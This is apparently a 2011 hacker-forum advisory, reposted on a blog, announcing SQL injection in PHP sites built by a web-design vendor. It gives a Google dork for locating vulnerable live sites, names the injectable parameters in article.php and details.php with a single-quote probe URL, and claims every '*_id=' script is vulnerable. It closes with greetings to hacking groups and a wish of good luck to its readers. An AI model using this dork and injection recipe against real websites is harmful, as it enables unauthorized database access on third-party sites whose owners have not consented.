#####################################
# Title : ChromeMedia SQL Injection Vulnerability
# Author: Kalashinkov3
# Vendor: [www.chromemedia.com]
# Email : kalashinkov3[at]Hotmail[dot].Fr
# Date : 22/05/2011
# Google Dork : intext:"Web Design by ChromeMedia Inc" inurl:*.php?
# Category : PHP [SQli]
#####################################

*_Exploit_*

# http://[localhost]/*/*/article.php?content_id='22
# http://[localhost]/*/*/article.php?content_id=[SQLI]


# http://[localhost]/*/*/details.php?product_id='20
# http://[localhost]/*/*/details.php?product_id=[SQLI]

# all php files "*.php?*_id= " are vulnerable #


^_^ G00d LUCK ALL :=)

======================================
# Greets To : BrOx-dz & all Algerians Hacker'S ;) & All mmembre 1337Day #
24 May 2011

0 comments:

Post a Comment

WELLCOME MY WEB

:) :)) ;(( :-) =)) ;( ;-( :d :-d @-) :p :o :>) (o) [-( :-? (p) :-s (m) 8-) :-t :-b b-( :-# =p~ $-) (b) (f) x-) (k) (h) (c) cheer
Click to see the code!
To insert emoticon you must added at least one space before the code.

 
Top